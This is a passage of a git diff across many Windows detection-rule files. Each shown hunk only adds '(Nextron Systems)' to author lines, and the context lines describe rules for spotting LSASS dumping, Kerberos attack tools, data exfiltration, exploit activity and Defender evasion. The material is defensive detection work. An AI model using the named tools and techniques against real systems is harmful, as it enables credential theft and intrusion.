diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
index a78a036fb..cbb27d2cb 100644
--- a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml
@@ -9,7 +9,7 @@ references:
 - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
 - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/
 - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/19
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
index 8b67e3873..48ad25785 100644
--- a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml
@@ -9,7 +9,7 @@ references:
 - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
 - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/
 - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/19
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml
index 1cd365834..b6a651470 100644
--- a/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml
+++ b/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml
@@ -5,7 +5,7 @@ description: Detects usage of Dsacls to grant over permissive permissions
 references:
 - https://ss64.com/nt/dsacls.html
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml b/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml
index 2bf8cd2e0..6835c0934 100644
--- a/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml
+++ b/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml
@@ -6,7 +6,7 @@ references:
 - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone
 - https://ss64.com/nt/dsacls.html
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml b/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml
index 8b44faba3..4d2075134 100644
--- a/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml
+++ b/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
 references:
 - https://twitter.com/mrd0x/status/1479094189048713219
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/06
 modified: 2022/06/17
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml
index 10156a867..6bac7231f 100644
--- a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml
+++ b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml
@@ -5,7 +5,7 @@ description: Detects email exfiltration via powershell cmdlets
 references:
 - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
 - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml
-author: Nasreddine Bencherchali (rule), Azure-Sentinel (idea)
+author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
 date: 2022/09/09
 tags:
 - attack.exfiltration
diff --git a/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml b/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml
index c765e50f6..2c6e9b03b 100644
--- a/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml
+++ b/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
 - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
 - https://learn.microsoft.com/en-us/windows/wsl/install-on-server
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/29
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml b/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml
index 0f197287e..6a42b223d 100644
--- a/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml
@@ -10,7 +10,7 @@ references:
 - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt
 - https://github.com/HyperSine/how-does-MobaXterm-encrypt-password
 - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml b/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml
index a8427c87e..d2ff9fc52 100644
--- a/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml
+++ b/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml
@@ -6,7 +6,7 @@ references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
 - https://abuse.io/lockergoga.txt
 - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
-author: '@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community'
+author: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community'
 date: 2019/03/22
 modified: 2022/06/28
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml b/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml
index ea0a5b2fb..5702b52e9 100644
--- a/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of various cli utility related to web request exfiltrating data
 references:
 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/02
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml
index 7222bdb3d..df45e135c 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml
@@ -5,7 +5,7 @@ description: Detects Winword starting uncommon sub process MicroScMgmt.exe as us
 references:
 - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
 - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/22
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml
index 3b812365b..6686055e2 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
 references:
 - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/22
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml
index cee0661e0..626ae18a7 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml
@@ -5,7 +5,7 @@ description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and
 references:
 - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/23
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml
index 2a7f87ef0..9b7eb14dc 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml
@@ -5,7 +5,7 @@ description: Detects Winword starting uncommon sub process csc.exe as used in ex
 references:
 - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/09/15
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml
index 68f24b0a5..8507d69bf 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
 references:
 - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
-author: Florian Roth, oscd.community, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
 date: 2019/11/15
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml
index 6d6ba4f09..4caefbc84 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml
@@ -5,7 +5,7 @@ description: Detects an exploitation attempt in which the UAC consent dialogue i
 references:
 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/11/20
 modified: 2022/05/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml
index 7abb149d4..bbea5d7ad 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml
@@ -5,7 +5,7 @@ description: Detects the exploitation of Zoho ManageEngine Desktop Central Java
 references:
 - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
 - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/03/25
 modified: 2023/01/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml
index 3926e9c4b..9aaf3b3c6 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml
@@ -5,7 +5,7 @@ description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by th
 references:
 - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
 - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/15
 modified: 2022/07/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml b/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml
index aab417f24..d1ad4fe07 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml
@@ -5,7 +5,7 @@ description: Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a
 references:
 - https://github.com/klinix5/InstallerFileTakeOver
 - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/22
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml b/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml
index 7aa37c897..8d51eb481 100644
--- a/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml
+++ b/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM
 references:
 - https://github.com/GossiTheDog/SystemNightmare
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/11
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
index cc7b9efa0..2e768157f 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
 references:
 - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/12
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
index 79e84d4d7..441502c89 100644
--- a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
+++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of findstr with the "EVERYONE" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions
 references:
 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml b/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml
index ab5003732..1f469c3b1 100644
--- a/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
 references:
 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/10
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_gmer_execution.yml b/rules/windows/process_creation/proc_creation_win_gmer_execution.yml
index 81cbf312a..eba026303 100644
--- a/rules/windows/process_creation/proc_creation_win_gmer_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_gmer_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution GMER tool based on image and hash fields.
 references:
 - http://www.gmer.net/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/05
 modified: 2022/10/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml
index 23a623135..9a8a24ee3 100644
--- a/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI
 references:
 - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
-author: Nasreddine Bencherchali, X__Junior
+author: Nasreddine Bencherchali (Nextron Systems), X__Junior
 date: 2022/11/30
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml b/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml
index 6c7514655..e3084f44b 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
 references:
 - https://github.com/bats3c/ADCSPwn
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/31
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml b/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
index 28e82fc05..1191d6caa 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
@@ -5,7 +5,7 @@ description: Detects command line parameters used by Bloodhound and Sharphound h
 references:
 - https://github.com/BloodHoundAD/BloodHound
 - https://github.com/BloodHoundAD/SharpHound
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/20
 modified: 2022/08/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml b/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml
index b0d9b235b..fd1cbbaf8 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml
@@ -5,7 +5,7 @@ description: Detects the use of tools created by a well-known hacktool producer
 references:
 - https://github.com/cube0x0
 - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/27
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml b/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml
index f6fc0fa0f..317397084 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml
@@ -5,7 +5,7 @@ description: Detects the use of Dumpert process dumper, which dumps the lsass.ex
 references:
 - https://github.com/outflanknl/Dumpert
 - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/02/04
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hack_htran.yml b/rules/windows/process_creation/proc_creation_win_hack_htran.yml
index 5383dec3b..05103430a 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_htran.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_htran.yml
@@ -5,7 +5,7 @@ description: Detects exeuctable names or flags used by Htran or Htran-like tools
 references:
 - https://github.com/HiwinCN/HTran
 - https://github.com/cw1997/NATBypass
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/12/27
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml b/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml
index 5438d6456..9bfca6829 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml
@@ -5,7 +5,7 @@ description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-
 references:
 - https://github.com/Kevin-Robertson/Inveigh
 - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/24
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml b/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml
index 4862e060b..f61a30691 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of KrbRelay, a Kerberos relaying tool
 references:
 - https://github.com/cube0x0/KrbRelay
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/27
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml b/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml
index 9f51d4759..5967b60bf 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced
 references:
 - https://github.com/Dec0ne/KrbRelayUp
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/26
 modified: 2022/04/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml b/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml
index 608175141..044e396a5 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml
@@ -6,7 +6,7 @@ references:
 - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
 - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
 - https://github.com/GhostPack/Rubeus
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/12/19
 modified: 2022/10/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml b/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml
index 6e3cf2f82..ab58396ed 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
 references:
 - https://github.com/GhostPack/SafetyKatz
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/20
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml b/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml
index 0ef80cfae..e66c218a3 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml
@@ -5,7 +5,7 @@ description: Detects the execution of SecurityXploded Tools
 references:
 - https://securityxploded.com/
 - https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/12/19
 modified: 2021/05/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml
index cfc6865e2..aa15c014f 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml
@@ -5,7 +5,7 @@ description: Detects the execution of the hacktool SharPersist - used to deploy
 references:
 - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit
 - https://github.com/mandiant/SharPersist
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/15
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml
index 5281027ac..b19940e26 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller
 references:
 - https://github.com/bugch3ck/SharpLdapWhoami
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/29
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml b/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml
index 6b400e6a5..99893be35 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
 references:
 - https://github.com/Wh04m1001/SysmonEoP
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/12/04
 tags:
 - cve.2022.41120
diff --git a/rules/windows/process_creation/proc_creation_win_hack_wce.yml b/rules/windows/process_creation/proc_creation_win_hack_wce.yml
index df6806703..53356e898 100644
--- a/rules/windows/process_creation/proc_creation_win_hack_wce.yml
+++ b/rules/windows/process_creation/proc_creation_win_hack_wce.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of Windows Credential Editor (WCE)
 references:
 - https://www.ampliasecurity.com/research/windows-credentials-editor/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/31
 modified: 2022/03/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml
index 2f9418e0f..91f9a3242 100644
--- a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml
+++ b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/04
 modified: 2022/09/07
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_handlekatz.yml b/rules/windows/process_creation/proc_creation_win_handlekatz.yml
index f7469840c..80ddeea3f 100644
--- a/rules/windows/process_creation/proc_creation_win_handlekatz.yml
+++ b/rules/windows/process_creation/proc_creation_win_handlekatz.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
 references:
 - https://github.com/codewhitesec/HandleKatz
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/18
 modified: 2022/10/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml b/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml
index 5e08c41ab..ad68c5ae8 100644
--- a/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml
+++ b/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml
@@ -5,7 +5,7 @@ description: Detects usage of hh.exe to execute/download remotely hosted .chm fi
 references:
 - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html
 - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md
-author: Nasreddine Bencherchali
